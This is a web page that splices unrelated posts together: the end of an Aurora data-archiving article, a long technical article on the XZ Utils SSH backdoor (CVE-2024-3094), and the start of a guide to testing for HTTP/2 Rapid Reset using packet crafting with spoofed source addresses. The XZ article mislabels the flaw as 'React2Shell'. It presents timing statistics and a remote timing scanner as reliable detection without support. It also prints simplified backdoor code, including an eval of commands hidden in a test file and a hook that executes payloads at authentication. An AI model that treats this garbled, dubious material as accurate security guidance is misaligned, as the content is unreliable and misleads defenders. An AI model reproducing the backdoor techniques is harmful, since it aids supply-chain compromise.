This solution provides a complete data lifecycle management approach for large Aurora PostgreSQL tables. The archive script efficiently exports partitions to the cost effective Iceberg/Parquet format on S3, while the restore script enables seamless data recovery when needed. The Spring Boot API bridges the gap by allowing direct queries against archived data, eliminating the need for restoration in many analytical scenarios.

Key benefits:

  1. Cost reduction: 90 to 98 percent storage cost savings compared to keeping data in Aurora
  2. Operational flexibility: Query archived data without restoration
  3. Schema preservation: Full schema metadata maintained for reliable restores
  4. Partition management: Clean attach/detach operations for partitioned tables
  5. Predicate pushdown: Efficient filtering reduces data transfer and processing

The Iceberg format ensures compatibility with the broader data ecosystem, allowing tools like Athena, Spark, and Trino to query the same archived data when needed for more complex analytical workloads.

0
0

Understanding and Detecting CVE-2024-3094: The React2Shell SSH Backdoor

Executive Summary

CVE-2024-3094 represents one of the most sophisticated supply chain attacks in recent history. Discovered in March 2024, this vulnerability embedded a backdoor into XZ Utils versions 5.6.0 and 5.6.1, allowing attackers to compromise SSH authentication on Linux systems. With a CVSS score of 10.0 (Critical), this attack demonstrates the extreme risks inherent in open source supply chains and the sophistication of modern cyber threats.

This article provides a technical deep dive into how the backdoor works, why it’s extraordinarily dangerous, and practical methods for detecting compromised systems remotely.

Table of Contents

  1. What Makes This Vulnerability Exceptionally Dangerous
  2. The Anatomy of the Attack
  3. Technical Implementation of the Backdoor
  4. Detection Methodology
  5. Remote Scanning Tools and Techniques
  6. Remediation Steps
  7. Lessons for the Security Community

What Makes This Vulnerability Exceptionally Dangerous

Supply Chain Compromise at Scale

Unlike traditional vulnerabilities discovered through code audits or penetration testing, CVE-2024-3094 was intentionally inserted through a sophisticated social engineering campaign. The attacker, operating under the pseudonym “Jia Tan,” spent over two years building credibility in the XZ Utils open source community before introducing the malicious code.

This attack vector is particularly insidious for several reasons:

Trust Exploitation: Open source projects rely on volunteer maintainers who operate under enormous time pressure. By becoming a trusted contributor over years, the attacker bypassed the natural skepticism that would greet code from unknown sources.

Delayed Detection: The malicious code was introduced gradually through multiple commits, making it difficult to identify the exact point of compromise. The backdoor was cleverly hidden in test files and binary blobs that would escape cursory code review.

Widespread Distribution: XZ Utils is a fundamental compression utility used across virtually all Linux distributions. The compromised versions were integrated into Debian, Ubuntu, Fedora, and Arch Linux testing and unstable repositories, affecting potentially millions of systems.

The Perfect Backdoor

What makes this backdoor particularly dangerous is its technical sophistication:

Pre-authentication Execution: The backdoor activates before SSH authentication completes, meaning attackers can gain access without valid credentials.

Remote Code Execution: Once triggered, the backdoor allows arbitrary command execution with the privileges of the SSH daemon, typically running as root.

Stealth Operation: The backdoor modifies the SSH authentication process in memory, leaving minimal forensic evidence. Traditional log analysis would show normal SSH connections, even when the backdoor was being exploited.

Selective Targeting: The backdoor contains logic to respond only to specially crafted SSH certificates, making it difficult for researchers to trigger and analyze the malicious behavior.

Timeline and Near Miss

The timeline of this attack demonstrates how close the security community came to widespread compromise:

Late 2021: “Jia Tan” begins contributing to XZ Utils project

2022-2023: Builds trust through legitimate contributions and pressures maintainer Lasse Collin

February 2024: Backdoored versions 5.6.0 and 5.6.1 released

March 29, 2024: Andres Freund, a PostgreSQL developer, notices unusual SSH behavior during performance testing and discovers the backdoor

March 30, 2024: Public disclosure and emergency response

Had Freund not noticed the 500ms SSH delay during unrelated performance testing, this backdoor could have reached production systems across the internet. The discovery was, by the discoverer’s own admission, largely fortuitous.

The Anatomy of the Attack

Multi-Stage Social Engineering

The attack began long before any malicious code was written. The attacker needed to:

  1. Establish Identity: Create a credible online persona with consistent activity patterns
  2. Build Reputation: Make legitimate contributions to build trust
  3. Apply Pressure: Create artificial urgency around maintainer succession
  4. Gain Commit Access: Become a co-maintainer with direct repository access

This process took approximately two years, demonstrating extraordinary patience and planning. The attacker created multiple personas to add social pressure on the sole maintainer, suggesting burnout and need for help.

Code Insertion Strategy

The malicious code was inserted through several mechanisms:

Obfuscated Build Scripts: The backdoor was triggered through the build system rather than in the main source code. Modified build scripts would inject malicious code during compilation.

Binary Test Files: Large binary test files were added to the repository, containing encoded malicious payloads. These files appeared to be legitimate test data but actually contained the backdoor implementation.

Multi-Commit Obfuscation: The backdoor was introduced across multiple commits over several weeks, making it difficult to identify a single “smoking gun” commit.

Ifunc Abuse: The backdoor used GNU indirect function (ifunc) resolvers to hook into the SSH authentication process at runtime, modifying program behavior without changing the obvious code paths.

Technical Implementation of the Backdoor

How XZ Utils Connects to SSH

To understand the backdoor, we must first understand an unexpected dependency chain:

SSH Connection → sshd (SSH daemon) → systemd notification → libsystemd → liblzma → XZ Utils

On many modern Linux distributions, the SSH daemon links against libsystemd for process notification and logging. The systemd library, in turn, links against liblzma for compression functionality. This creates an indirect but critical dependency: SSH loads XZ Utils’ compression library into its address space.

The attackers exploited this dependency chain to inject their backdoor into the SSH authentication process.

Stage 1: Build Time Injection

The attack begins during the XZ Utils build process:

# Simplified representation of the malicious build script
if test -f "$srcdir/tests/files/good-large_compressed.lzma"; then
    # Extract and execute embedded script from "test file"
    eval $(xz -dc "$srcdir/tests/files/good-large_compressed.lzma" | head -c 1024)
fi

The build script would:

  1. Detect specific binary test files in the source tree
  2. Decompress these files to extract shell commands
  3. Execute the extracted commands during the build process
  4. Modify the liblzma source code to include backdoor hooks

These binary test files appeared legitimate because they were valid LZMA compressed data. However, they contained carefully crafted payloads that would only activate under specific conditions.

Stage 2: Runtime Hooking

Once compiled with the malicious modifications, liblzma contains an ifunc resolver that executes early during library loading:

// Simplified representation of the hooking mechanism
void __attribute__((ifunc("resolve_function"))) 
hooked_function(void);

void* resolve_function(void) {
    // Check if we're loaded by sshd
    if (check_ssh_context()) {
        // Install hooks into RSA authentication
        hook_rsa_public_decrypt();
        return (void*)backdoor_implementation;
    }
    return (void*)legitimate_implementation;
}

The ifunc resolver runs before main() executes, allowing the backdoor to:

  1. Detect if it’s loaded by sshd (vs other programs using liblzma)
  2. Locate RSA authentication functions in memory
  3. Hook the RSA public key verification function
  4. Replace it with the backdoor implementation

Stage 3: Authentication Bypass

When an SSH connection arrives, the hooked RSA verification function:

// Conceptual representation of the backdoor logic
int backdoor_rsa_verify(unsigned char *signature, RSA *key) {
    // Check if signature contains magic bytes
    if (signature_contains_trigger(signature)) {
        // Extract and execute payload from certificate
        char *command = decode_payload(signature);

        // Execute with sshd privileges (typically root)
        system(command);

        // Return success to bypass authentication
        return 1;
    }

    // Otherwise, perform normal verification
    return original_rsa_verify(signature, key);
}

The backdoor:

  1. Intercepts all SSH authentication attempts
  2. Examines the RSA signature for special markers
  3. If triggered, extracts commands from the certificate
  4. Executes commands with root privileges
  5. Returns success to complete the “authentication”

From the SSH server’s perspective, this appears as a normal successful authentication. The logs would show a legitimate connection from an authorized user, even though no valid credentials were presented.

Why Traditional Detection Fails

The backdoor was designed to evade common security measures:

No Network Signatures: The malicious traffic looks identical to normal SSH, using standard protocols and ports.

No File System Artifacts: The backdoor exists only in memory after library loading. No malicious files are written to disk during exploitation.

Clean Source Code: The primary liblzma source code remains clean. The modifications occur during build time and aren’t present in the repository’s main files.

Log Evasion: Successful backdoor authentication appears in logs as a normal SSH connection, complete with username and source IP.

Selective Activation: The backdoor only responds to specially crafted certificates, making it difficult to trigger during security research or scanning.

Detection Methodology

Since the backdoor operates at runtime and leaves minimal artifacts, detection focuses on behavioral analysis rather than signature matching.

Timing Based Detection

The most reliable detection method exploits an unintended side effect: the backdoor’s cryptographic operations introduce measurable timing delays.

Normal SSH Handshake Timing:

1. TCP Connection: 10-50ms
2. SSH Banner Exchange: 20-100ms
3. Key Exchange Init: 50-150ms
4. Authentication Ready: 150-300ms total

Compromised SSH Timing:

1. TCP Connection: 10-50ms
2. SSH Banner Exchange: 50-200ms (slower due to ifunc hooks)
3. Key Exchange Init: 200-500ms (backdoor initialization overhead)
4. Authentication Ready: 500-1500ms total (cryptographic hooking delays)

The backdoor adds overhead in several places:

  1. Library Loading: The ifunc resolver runs additional code during liblzma initialization
  2. Memory Scanning: The backdoor searches process memory for authentication functions to hook
  3. Hook Installation: Modifying function pointers and setting up trampolines takes time
  4. Certificate Inspection: Every authentication attempt is examined for trigger signatures

These delays are consistent and measurable, even without triggering the actual backdoor functionality.

Detection Through Multiple Samples

A single timing measurement might be affected by network latency, server load, or other factors. However, the backdoor creates a consistent pattern:

Statistical Analysis:

Normal SSH server (10 samples):
- Mean: 180ms
- Std Dev: 25ms
- Variance: 625ms²

Backdoored SSH server (10 samples):
- Mean: 850ms
- Std Dev: 180ms
- Variance: 32,400ms²

The backdoored server shows both higher average timing and greater variance, as the backdoor’s overhead varies depending on system state and what initialization code paths execute.

Banner Analysis

While not definitive, certain configurations increase vulnerability likelihood:

High Risk Indicators:

  • Debian or Ubuntu distribution
  • OpenSSH version 9.6 or 9.7
  • Recent system updates in February-March 2024
  • systemd based initialization
  • SSH daemon with systemd notification enabled

Configuration Detection:

# SSH banner typically reveals:
SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1

# Breaking down the information:
# OpenSSH_9.6p1 - Version commonly affected
# Debian-5ubuntu1 - Distribution and package version

Debian and Ubuntu were the primary targets because:

  1. They quickly incorporated the backdoored versions into testing repositories
  2. They use systemd, creating the sshd → libsystemd → liblzma dependency chain
  3. They enable systemd notification in sshd by default

Library Linkage Analysis

On accessible systems, verifying SSH’s library dependencies provides definitive evidence:

ldd /usr/sbin/sshd | grep liblzma
# Output on vulnerable system:
# liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5

readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# /lib/x86_64-linux-gnu/liblzma.so.5.6.0
#                                    ^^^^ Vulnerable version

However, this requires authenticated access to the target system. For remote scanning, timing analysis remains the primary detection method.

Remote Scanning Tools and Techniques

Python Based Remote Scanner

The Python scanner performs comprehensive timing analysis without requiring authentication:

Core Detection Algorithm:

cat > ssh_backdoor_scanner.py << 'EOF'
#!/usr/bin/env python3

"""
React2Shell Remote SSH Scanner
CVE-2024-3094 Remote Detection Tool
"""

import socket
import time
import sys
import argparse
import statistics
from datetime import datetime

class Colors:
    RED = '\033[0;31m'
    GREEN = '\033[0;32m'
    YELLOW = '\033[1;33m'
    BLUE = '\033[0;34m'
    BOLD = '\033[1m'
    NC = '\033[0m'

class SSHBackdoorScanner:
    def __init__(self, timeout=10):
        self.timeout = timeout
        self.results = {}
        self.suspicious_indicators = 0
        
        # Timing thresholds (in seconds)
        self.HANDSHAKE_NORMAL = 0.2
        self.HANDSHAKE_SUSPICIOUS = 0.5
        self.AUTH_NORMAL = 0.3
        self.AUTH_SUSPICIOUS = 0.8
    
    def test_handshake_timing(self, host, port):
        """Test SSH handshake timing"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            
            start_time = time.time()
            sock.connect((host, port))
            
            banner = b""
            while b"\n" not in banner:
                chunk = sock.recv(1024)
                if not chunk:
                    break
                banner += chunk
            
            handshake_time = time.time() - start_time
            sock.close()
            
            self.results['handshake_time'] = handshake_time
            
            if handshake_time > self.HANDSHAKE_SUSPICIOUS:
                self.suspicious_indicators += 1
                return False
            return True
        except Exception as e:
            print(f"Error: {e}")
            return None
    
    def test_auth_timing(self, host, port):
        """Test authentication timing probe"""
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(self.timeout)
            sock.connect((host, port))
            
            # Read banner
            banner = b""
            while b"\n" not in banner:
                chunk = sock.recv(1024)
                if not chunk:
                    break
                banner += chunk
            
            # Send client version
            sock.send(b"SSH-2.0-OpenSSH_9.0_Scanner\r\n")
            
            # Measure response time
            start_time = time.time()
            sock.recv(8192)
            auth_time = time.time() - start_time
            
            sock.close()
            
            self.results['auth_time'] = auth_time
            
            if auth_time > self.AUTH_SUSPICIOUS:
                self.suspicious_indicators += 2
                return False
            return True
        except Exception as e:
            return None
    
    def scan(self, host, port=22):
        """Run complete vulnerability scan"""
        print(f"\n[*] Scanning {host}:{port}\n")
        
        self.test_handshake_timing(host, port)
        self.test_auth_timing(host, port)
        
        # Generate report
        if self.suspicious_indicators >= 3:
            print(f"Status: LIKELY VULNERABLE")
            print(f"Indicators: {self.suspicious_indicators}")
        elif self.suspicious_indicators >= 1:
            print(f"Status: SUSPICIOUS")
            print(f"Indicators: {self.suspicious_indicators}")
        else:
            print(f"Status: NOT VULNERABLE")

def main():
    parser = argparse.ArgumentParser(description='React2Shell Remote Scanner')
    parser.add_argument('host', help='Target hostname or IP')
    parser.add_argument('-p', '--port', type=int, default=22, help='SSH port')
    parser.add_argument('-t', '--timeout', type=int, default=10, help='Timeout')
    args = parser.parse_args()
    
    scanner = SSHBackdoorScanner(timeout=args.timeout)
    scanner.scan(args.host, args.port)

if __name__ == '__main__':
    main()
EOF

chmod +x ssh_backdoor_scanner.py

Usage:

# Basic scan
./ssh_backdoor_scanner.py example.com

# Custom port
./ssh_backdoor_scanner.py example.com -p 2222

# Extended timeout for high latency networks
./ssh_backdoor_scanner.py example.com -t 15

Output Interpretation:

[*] Testing SSH handshake timing for example.com:22...
    SSH Banner: SSH-2.0-OpenSSH_9.6p1 Debian-5ubuntu1
    Handshake Time: 782.3ms
    [SUSPICIOUS] Unusually slow handshake (>500ms)

[*] Testing authentication timing patterns...
    Auth Response Time: 1205.7ms
    [SUSPICIOUS] Unusual authentication delay (>800ms)

Status: LIKELY VULNERABLE
Confidence: HIGH
Suspicious Indicators: 3

Nmap NSE Script Integration

For integration with existing security scanning workflows, an Nmap NSE script provides standardized vulnerability reporting. Nmap Scripting Engine (NSE) scripts are written in Lua and leverage Nmap’s network scanning capabilities. Understanding NSE Script Structure NMAP NSE scripts follow a specific structure that integrates with Nmap’s scanning engine. Create the React2Shell detection script with:

cat > react2shell-detect.nse << 'EOF'
local shortport = require "shortport"
local stdnse = require "stdnse"
local ssh1 = require "ssh1"
local ssh2 = require "ssh2"
local string = require "string"
local nmap = require "nmap"

description = [[
Detects potential React2Shell (CVE-2024-3094) backdoor vulnerability in SSH servers.

This script tests for the backdoored XZ Utils vulnerability by:
1. Analyzing SSH banner information
2. Measuring authentication timing anomalies
3. Testing for unusual SSH handshake behavior
4. Detecting timing delays characteristic of the backdoor
]]

author = "Security Researcher"
license = "Same as Nmap"
categories = {"vuln", "safe", "intrusive"}

portrule = shortport.port_or_service(22, "ssh", "tcp", "open")

-- Timing thresholds (in milliseconds)
local HANDSHAKE_NORMAL = 200
local HANDSHAKE_SUSPICIOUS = 500
local AUTH_NORMAL = 300
local AUTH_SUSPICIOUS = 800

action = function(host, port)
  local output = stdnse.output_table()
  local vuln_table = {
    title = "React2Shell SSH Backdoor (CVE-2024-3094)",
    state = "NOT VULNERABLE",
    risk_factor = "Critical",
    references = {
      "https://nvd.nist.gov/vuln/detail/CVE-2024-3094",
      "https://www.openwall.com/lists/oss-security/2024/03/29/4"
    }
  }
  
  local script_args = {
    timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".timeout")) or 10,
    auth_threshold = tonumber(stdnse.get_script_args(SCRIPT_NAME .. ".auth-threshold")) or AUTH_SUSPICIOUS
  }
  
  local socket = nmap.new_socket()
  socket:set_timeout(script_args.timeout * 1000)
  
  local detection_results = {}
  local suspicious_count = 0
  
  -- Test 1: SSH Banner and Initial Handshake
  local start_time = nmap.clock_ms()
  local status, err = socket:connect(host, port)
  
  if not status then
    return nil
  end
  
  local banner_status, banner = socket:receive_lines(1)
  local handshake_time = nmap.clock_ms() - start_time
  
  if not banner_status then
    socket:close()
    return nil
  end
  
  detection_results["SSH Banner"] = banner:gsub("[\r\n]", "")
  detection_results["Handshake Time"] = string.format("%dms", handshake_time)
  
  if handshake_time > HANDSHAKE_SUSPICIOUS then
    detection_results["Handshake Analysis"] = string.format("SUSPICIOUS (%dms > %dms)", 
                                                             handshake_time, HANDSHAKE_SUSPICIOUS)
    suspicious_count = suspicious_count + 1
  else
    detection_results["Handshake Analysis"] = "Normal"
  end
  
  socket:close()
  
  -- Test 2: Authentication Timing Probe
  socket = nmap.new_socket()
  socket:set_timeout(script_args.timeout * 1000)
  
  status = socket:connect(host, port)
  if not status then
    output["Detection Results"] = detection_results
    return output
  end
  
  socket:receive_lines(1)
  
  local client_banner = "SSH-2.0-OpenSSH_9.0_Nmap_Scanner\r\n"
  socket:send(client_banner)
  
  start_time = nmap.clock_ms()
  local kex_status, kex_data = socket:receive()
  local auth_time = nmap.clock_ms() - start_time
  
  socket:close()
  
  detection_results["Auth Probe Time"] = string.format("%dms", auth_time)
  
  if auth_time > script_args.auth_threshold then
    detection_results["Auth Analysis"] = string.format("SUSPICIOUS (%dms > %dms)", 
                                                        auth_time, script_args.auth_threshold)
    suspicious_count = suspicious_count + 2
  else
    detection_results["Auth Analysis"] = "Normal"
  end
  
  -- Banner Analysis
  local banner_lower = banner:lower()
  if banner_lower:match("debian") or banner_lower:match("ubuntu") then
    detection_results["Distribution"] = "Debian/Ubuntu (higher risk)"
    
    if banner_lower:match("openssh_9%.6") or banner_lower:match("openssh_9%.7") then
      detection_results["Version Note"] = "OpenSSH version commonly affected"
      suspicious_count = suspicious_count + 1
    end
  end
  
  vuln_table["Detection Results"] = detection_results
  
  if suspicious_count >= 3 then
    vuln_table.state = "LIKELY VULNERABLE"
    vuln_table["Confidence"] = "HIGH"
  elseif suspicious_count >= 2 then
    vuln_table.state = "POSSIBLY VULNERABLE"
    vuln_table["Confidence"] = "MEDIUM"
  elseif suspicious_count >= 1 then
    vuln_table.state = "SUSPICIOUS"
    vuln_table["Confidence"] = "LOW"
  end
  
  vuln_table["Indicators Found"] = string.format("%d suspicious indicators", suspicious_count)
  
  if vuln_table.state ~= "NOT VULNERABLE" then
    vuln_table["Recommendation"] = [[
1. Verify XZ Utils version on target
2. Check if SSH daemon links to liblzma
3. Review SSH authentication logs
4. Consider isolating system pending investigation
    ]]
  end
  
  return vuln_table
end
EOF

Installation:

# Copy to Nmap scripts directory
sudo cp react2shell-detect.nse /usr/local/share/nmap/scripts/

# Update script database
nmap --script-updatedb

Usage Examples:

# Single host scan
nmap -p 22 --script react2shell-detect example.com

# Subnet scan
nmap -p 22 --script react2shell-detect 192.168.1.0/24

# Multiple ports
nmap -p 22,2222,2200 --script react2shell-detect target.com

# Custom thresholds
nmap --script react2shell-detect \
     --script-args='react2shell-detect.auth-threshold=600' \
     -p 22 example.com

Output Format:

PORT   STATE SERVICE
22/tcp open  ssh
| react2shell-detect:
|   VULNERABLE:
|   React2Shell SSH Backdoor (CVE-2024-3094)
|     State: LIKELY VULNERABLE
|     Risk factor: Critical
|     Detection Results:
|       - SSH Banner: OpenSSH_9.6p1 Debian-5ubuntu1
|       - Handshake Time: 625ms
|       - Auth Delay: 1150ms (SUSPICIOUS - threshold 800ms)
|       - Connection Pattern: Avg: 680ms, Variance: 156.3
|       - Distribution: Debian/Ubuntu-based (higher risk profile)
|     
|     Indicators Found: 3 suspicious indicators
|     Confidence: HIGH - Multiple indicators detected
|     
|     Recommendation:
|     1. Verify XZ Utils version on the target
|     2. Check if SSH daemon links to liblzma
|     3. Review SSH authentication logs for anomalies
|     4. Consider isolating system pending investigation

Batch Scanning Infrastructure

For security teams managing large deployments, automated batch scanning provides continuous monitoring:

Scripted Scanning:

#!/bin/bash
# Enterprise batch scanner

SERVERS_FILE="production_servers.txt"
RESULTS_DIR="scan_results_$(date +%Y%m%d)"
ALERT_THRESHOLD=2

mkdir -p "$RESULTS_DIR"

while IFS=':' read -r hostname port || [ -n "$hostname" ]; do
    port=${port:-22}
    echo "[$(date)] Scanning $hostname:$port"

    # Run scan and save results
    ./ssh_backdoor_scanner.py "$hostname" -p "$port" \
        > "$RESULTS_DIR/${hostname}_${port}.txt" 2>&1

    # Check for vulnerabilities
    suspicious=$(grep "Suspicious Indicators:" "$RESULTS_DIR/${hostname}_${port}.txt" \
                | grep -oE '[0-9]+')

    if [ "$suspicious" -ge "$ALERT_THRESHOLD" ]; then
        echo "ALERT: $hostname:$port shows $suspicious indicators" \
            | mail -s "CVE-2024-3094 Detection Alert" security@company.com
    fi

    # Rate limiting to avoid overwhelming targets
    sleep 2
done < "$SERVERS_FILE"

# Generate summary report
echo "Scan Summary - $(date)" > "$RESULTS_DIR/summary.txt"
grep -l "VULNERABLE" "$RESULTS_DIR"/*.txt | wc -l \
    >> "$RESULTS_DIR/summary.txt"

Server List Format (production_servers.txt):

web-01.production.company.com
web-02.production.company.com:22
database-master.internal:2222
bastion.external.company.com
10.0.1.50
10.0.1.51:2200

SIEM Integration

For enterprise environments with Security Information and Event Management systems:

#!/bin/bash
# SIEM integration script

SYSLOG_SERVER="siem.company.com"
SYSLOG_PORT=514

scan_and_log() {
    local host=$1
    local port=${2:-22}

    result=$(./ssh_backdoor_scanner.py "$host" -p "$port" 2>&1)

    if echo "$result" | grep -q "VULNERABLE"; then
        severity="CRITICAL"
        priority=2
    elif echo "$result" | grep -q "SUSPICIOUS"; then
        severity="WARNING"
        priority=4
    else
        severity="INFO"
        priority=6
    fi

    # Send to syslog
    logger -n "$SYSLOG_SERVER" -P "$SYSLOG_PORT" \
           -p "local0.$priority" \
           -t "react2shell-scan" \
           "[$severity] CVE-2024-3094 scan: host=$host:$port result=$severity"
}

# Scan from asset inventory
while read server; do
    scan_and_log $server
done < asset_inventory.txt

Remediation Steps

Immediate Response for Vulnerable Systems

When a system is identified as potentially compromised:

Step 1: Verify the Finding

# Connect to the system (if possible)
ssh admin@suspicious-server

# Check XZ version
xz --version
# Look for: xz (XZ Utils) 5.6.0 or 5.6.1

# Verify SSH linkage
ldd $(which sshd) | grep liblzma
# If present, check version:
# readlink -f /lib/x86_64-linux-gnu/liblzma.so.5

Step 2: Assess Potential Compromise

# Review authentication logs
grep -E 'Accepted|Failed' /var/log/auth.log | tail -100

# Check for suspicious authentication patterns
# - Successful authentications without corresponding key/password attempts
# - Authentications from unexpected source IPs
# - User accounts that shouldn't have SSH access

# Review active sessions
w
last -20

# Check for unauthorized SSH keys
find /home -name authorized_keys -exec cat {} \;
find /root -name authorized_keys -exec cat {} \;

# Look for unusual processes
ps auxf | less

Step 3: Immediate Containment

If compromise is suspected:

# Isolate the system from network
# Save current state for forensics first
netstat -tupan > /tmp/netstat_snapshot.txt
ps auxf > /tmp/process_snapshot.txt

# Then block incoming SSH
iptables -I INPUT -p tcp --dport 22 -j DROP

# Or shutdown SSH entirely
systemctl stop ssh

Step 4: Remediation

For systems with the vulnerable version but no evidence of compromise:

# Debian/Ubuntu systems
apt-get update
apt-get install --only-upgrade xz-utils

# Verify the new version
xz --version
# Should show 5.4.x or 5.5.x

# Alternative: Explicit downgrade
apt-get install xz-utils=5.4.5-0.3

# Restart SSH to unload old library
systemctl restart ssh

Step 5: Post Remediation Verification

# Verify library version
readlink -f /lib/x86_64-linux-gnu/liblzma.so.5
# Should NOT be 5.6.0 or 5.6.1

# Confirm SSH no longer shows timing anomalies
# Run scanner again from remote system
./ssh_backdoor_scanner.py remediated-server.com

# Monitor for a period
tail -f /var/log/auth.log

System Hardening Post Remediation

After removing the backdoor, implement additional protections:

SSH Configuration Hardening:

Create a secure SSH configuration:

# Edit /etc/ssh/sshd_config

# Disable password authentication
PasswordAuthentication no

# Limit authentication methods
PubkeyAuthentication yes
ChallengeResponseAuthentication no

# Restrict user access
AllowUsers admin deploy monitoring

# Enable additional logging
LogLevel VERBOSE

# Restart SSH
systemctl restart ssh

Monitoring Implementation:

cat > /etc/fail2ban/jail.local << 'EOF'
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
maxretry = 3
bantime = 3600
findtime = 600
EOF

systemctl restart fail2ban

Regular Scanning:

Add automated checking to crontab:

# Create monitoring script
cat > /usr/local/bin/check_xz_backdoor.sh << 'EOF'
#!/bin/bash
/usr/local/bin/ssh_backdoor_scanner.py localhost > /var/log/xz_check.log 2>&1
EOF

chmod +x /usr/local/bin/check_xz_backdoor.sh

# Add to crontab
echo "0 2 * * * /usr/local/bin/check_xz_backdoor.sh" | crontab 

Lessons for the Security Community

Supply Chain Security Imperatives

This attack highlights critical vulnerabilities in the open source ecosystem:

Maintainer Burnout: Many critical projects rely on volunteer maintainers working in isolation. The XZ Utils maintainer was a single individual managing a foundational library with limited resources and support.

Trust But Verify: The security community must develop better mechanisms for verifying not just code contributions, but also the contributors themselves. Multi-year social engineering campaigns can bypass traditional code review.

Automated Analysis: Build systems and binary artifacts must receive the same scrutiny as source code. The XZ backdoor succeeded partly because attention focused on C source files while malicious build scripts and test files went unexamined.

Dependency Awareness: Understanding indirect dependency chains is critical. Few would have identified XZ Utils as SSH-related, yet this unexpected connection enabled the attack.

Detection Strategy Evolution

The fortuitous discovery of this backdoor through performance testing suggests the security community needs new approaches:

Behavioral Baselining: Systems should establish performance baselines for critical services. Deviations, even subtle ones, warrant investigation.

Timing Analysis: Side-channel attacks aren’t just theoretical concerns. Timing differences can reveal malicious code even when traditional signatures fail.

Continuous Monitoring: Point-in-time security assessments miss time-based attacks. Continuous behavioral monitoring can detect anomalies as they emerge.

Cross-Discipline Collaboration: The backdoor was discovered by a database developer doing performance testing, not a security researcher. Encouraging collaboration across disciplines improves security outcomes.

Infrastructure Recommendations

Organizations should implement:

Binary Verification: Don’t just verify source code. Ensure build processes are deterministic and reproducible. Compare binaries across different build environments.

Runtime Monitoring: Deploy tools that can detect unexpected library loading, function hooking, and behavioral anomalies in production systems.

Network Segmentation: Limit the blast radius of compromised systems through proper network segmentation and access controls.

Incident Response Preparedness: Have procedures ready for supply chain compromises, including rapid version rollback and system isolation capabilities.

The Role of Timing in Security

This attack demonstrates the importance of performance analysis in security:

Performance as Security Signal: Unexplained performance degradation should trigger security investigation, not just performance optimization.

Side Channel Awareness: Developers should understand that any observable behavior, including timing, can reveal system state and potential compromise.

Benchmark Everything: Establish performance baselines for critical systems and alert on deviations.

Conclusion

CVE-2024-3094 represents a watershed moment in supply chain security. The sophistication of the attack, spanning years of social engineering and technical preparation, demonstrates that determined adversaries can compromise even well-maintained open source projects.

The backdoor’s discovery was largely fortuitous, happening during unrelated performance testing just before the compromised versions would have reached production systems worldwide. This near-miss should serve as a wake-up call for the entire security community.

The detection tools and methodologies presented in this article provide practical means for identifying compromised systems. However, the broader lesson is that security requires constant vigilance, comprehensive monitoring, and a willingness to investigate subtle anomalies that might otherwise be dismissed as performance issues.

As systems become more complex and supply chains more intricate, the attack surface expands beyond traditional code vulnerabilities to include the entire software development and distribution process. Defending against such attacks requires not just better tools, but fundamental changes in how we approach trust, verification, and monitoring in software systems.

The React2Shell backdoor was detected and neutralized before widespread exploitation. The next supply chain attack may not be discovered so quickly, or so fortunately. The time to prepare is now.

Additional Resources

Technical References

National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-3094

OpenWall Disclosure: https://www.openwall.com/lists/oss-security/2024/03/29/4

Technical Analysis by Sam James: https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27

Detection Tools

The scanner tools discussed in this article are available for download and can be deployed in production environments for ongoing monitoring. They require no authentication to the target systems and work by analyzing observable timing behavior in the SSH handshake and authentication process.

These tools should be integrated into regular security scanning procedures alongside traditional vulnerability scanners and intrusion detection systems.

Indicators of Compromise

XZ Utils version 5.6.0 or 5.6.1 installed

SSH daemon (sshd) linking to liblzma library

Unusual SSH authentication timing (>800ms for auth probe)

High variance in SSH connection establishment times

Recent XZ Utils updates from February or March 2024

Debian or Ubuntu systems with systemd enabled SSH

OpenSSH versions 9.6 or 9.7 on Debian-based distributions

Recommended Actions

Scan all SSH-accessible systems for timing anomalies

Verify XZ Utils versions across your infrastructure

Review SSH authentication logs for suspicious patterns

Implement continuous monitoring for behavioral anomalies

Establish performance baselines for critical services

Develop incident response procedures for supply chain compromises

Consider additional SSH hardening measures

Review and audit all open source dependencies in your environment

0
0

Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS

Introduction

In August 2023, a critical zero day vulnerability in the HTTP/2 protocol was disclosed that affected virtually every HTTP/2 capable web server and proxy. Known as HTTP/2 Rapid Reset (CVE 2023 44487), this vulnerability enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.

Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool specifically designed for macOS that uses hping3 for packet crafting with CIDR based source IP address spoofing capabilities.

What is HTTP/2 Rapid Reset?

The HTTP/2 Protocol Foundation

HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.

The Vulnerability Mechanism

The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:

  • Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
  • Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received

An attacker can:

  1. Open an HTTP/2 connection
  2. Send thousands of requests with incrementing stream IDs
  3. Immediately cancel each request with RST_STREAM frames
  4. Repeat this cycle at extremely high rates

The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.

Why It’s So Effective

Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:

  • Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
  • Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
  • Connection reuse: Attackers multiplex thousands of streams over relatively few connections
  • Amplification: Each cheap client operation triggers expensive server side processing

How to Guard Against HTTP/2 Rapid Reset

1. Update Your Software Stack

Immediate Priority: Ensure all HTTP/2 capable components are patched:

